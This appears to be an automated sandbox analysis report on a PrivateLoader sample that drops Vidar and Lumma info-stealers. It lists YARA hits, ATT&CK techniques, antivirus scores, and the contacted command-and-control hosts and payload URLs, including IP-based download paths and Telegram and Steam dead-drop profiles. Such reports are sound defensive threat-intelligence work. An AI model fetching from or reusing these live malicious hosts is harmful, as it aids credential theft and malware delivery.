Source: Yara match	File source: Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBAAFIDGDA.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7828, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C750C40 sqlite3_bind_zeroblob,	1_2_6C750C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C750D60 sqlite3_bind_parameter_name,	1_2_6C750D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C678EA0 sqlite3_clear_bindings,	1_2_6C678EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C750B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6C750B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C676410 bind,WSAGetLastError,	1_2_6C676410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	511 Process Injection	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	14 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1lKbb2hF7fYToopfpmEvlyRN.exe	50%	ReversingLabs	Win32.Trojan.Privateloader
1lKbb2hF7fYToopfpmEvlyRN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\DBAAFIDGDA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	100%	Joe Sandbox ML
C:\ProgramData\DGDBKFBAKF.exe	100%	Joe Sandbox ML
C:\ProgramData\DBAAFIDGDA.exe	83%	ReversingLabs	Win32.Spyware.Vidar
C:\ProgramData\DGDBKFBAKF.exe	83%	ReversingLabs	Win32.Spyware.Lummastealer
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	83%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	83%	ReversingLabs	Win32.Spyware.Lummastealer

Source	Detection	Scanner	Label
http://schemas.mic	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	URL Reputation	safe
http://www.mozilla.com/en-US/blocklist/	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://arpdabl.zapto.JDBF	0%	Avira URL Cloud	safe
https://65.108.151.1087a81d3649xe	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/r	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Avira URL Cloud	safe
https://5.75.212.60/sqls.dll	100%	Avira URL Cloud	malware
https://store.steampowered.com/subscriber_agreement/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/s	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/Z	0%	Avira URL Cloud	safe
callosallsaospz.shop	100%	Avira URL Cloud	malware
https://65.108.151.108Local	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	Avira URL Cloud	safe
http://www.valvesoftware.com/legal.htm	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	Avira URL Cloud	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199747278259/badges	100%	Avira URL Cloud	malware
https://liernessfornicsa.shop/ff	0%	Avira URL Cloud	safe
https://5.75.212.60/1	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/l	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous	0%	Avira URL Cloud	safe
liernessfornicsa.shop	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	0%	Avira URL Cloud	safe
https://store.steampowered.com/privac	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/f	0%	Avira URL Cloud	safe
https://t.me/s41l0#69	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform	0%	Avira URL Cloud	safe
http://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
https://5.75.212.60/5	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0	0%	Avira URL Cloud	safe
https://t.me/armad2a	100%	Avira URL Cloud	malware
http://147.45.44.104/steals/gfn1go.exe1	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	Avira URL Cloud	safe
shepherdlyopzc.shop	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
https://5.75.212.60/mozglue.dll#	100%	Avira URL Cloud	malware
http://arpdabl.zapto.org/kV	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform:Unsu	0%	Avira URL Cloud	safe
upknittsoappz.shop	0%	Avira URL Cloud	safe
https://65.108.151.108/0?Q	0%	Avira URL Cloud	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	Avira URL Cloud	safe
https://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	Avira URL Cloud	safe
https://5.75.212.60/F	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199747278259	100%	Avira URL Cloud	malware
https://5.75.212.60/a	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	Avira URL Cloud	safe
https://5.75.212.60/indows.storage.dlll	100%	Avira URL Cloud	malware
https://liernessfornicsa.shop/dp	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org	0%	Avira URL Cloud	safe
https://65.108.151.108/_F	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	Avira URL Cloud	safe
unseaffarignsk.shop	0%	Avira URL Cloud	safe
https://5.75.212.60/p	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	Avira URL Cloud	safe
http://arpdabl.JKEBFHJDBF	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision~http://schemas.xmlsoap.o	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	Avira URL Cloud	safe
https://store.steampowered.com/about/	0%	Avira URL Cloud	safe
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://steamcommunity.com//	0%	Avira URL Cloud	safe
https://t.me/	0%	Avira URL Cloud	safe
https://65.108.151.108/&	0%	Avira URL Cloud	safe
https://t.me/s41l06#goMozilla/5.0	0%	Avira URL Cloud	safe
http://schemas.mi	0%	Avira URL Cloud	safe
https://t.me/armad2ahellosqls.dllsqlite3.dllIn	0%	Avira URL Cloud	safe
https://web.telegram.org	0%	Avira URL Cloud	safe
https://65.108.151.108/sqls.dll=Sq	0%	Avira URL Cloud	safe
https://steamcommunity.com/market/	0%	Avira URL Cloud	safe
https://help.steampowered.com/en/	0%	Avira URL Cloud	safe
https://store.steampowered.com/news/	0%	Avira URL Cloud	safe
http://147.45.44.104/steals/gfn1go.exedary=----HIDAKFIJJKJJJKEBKJEHult-release	0%	Avira URL Cloud	safe
https://5.75.212.60/softokn3.dll	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
steamcommunity.com	23.199.218.33	true	true	unknown
arpdabl.zapto.org	77.91.101.71	true	false	unknown
t.me	149.154.167.99	true	true	unknown
liernessfornicsa.shop	172.67.213.85	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://5.75.212.60/sqls.dll	false	Avira URL Cloud: malware	unknown
callosallsaospz.shop	true	Avira URL Cloud: malware	unknown
liernessfornicsa.shop	true	Avira URL Cloud: safe	unknown
shepherdlyopzc.shop	true	Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259	true	Avira URL Cloud: malware	unknown
unseaffarignsk.shop	true	Avira URL Cloud: safe	unknown
https://5.75.212.60/softokn3.dll	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.mic	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity	gfn1go[1].exe.1.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/r	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/s	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/subscriber_agreement/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.108.151.1087a81d3649xe	MSBuild.exe, 00000006.00000002.2617277364.0000000000566000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.JDBF	MSBuild.exe, 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/Z	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.108.151.108Local	MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	HJDBFB.1.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259/badges	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/l	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/1	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://liernessfornicsa.shop/ff	MSBuild.exe, 00000008.00000002.2273918492.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privac	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	false	URL Reputation: safe	unknown
http://arpdabl.zapto.org/f	MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/s41l0#69	MSBuild.exe, 00000006.00000002.2623692581.0000000001038000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	MSBuild.exe, MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/armad2a	1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104/steals/gfn1go.exe1	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/5	MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://store.steampowered.com/privacy_agreement/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp	DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
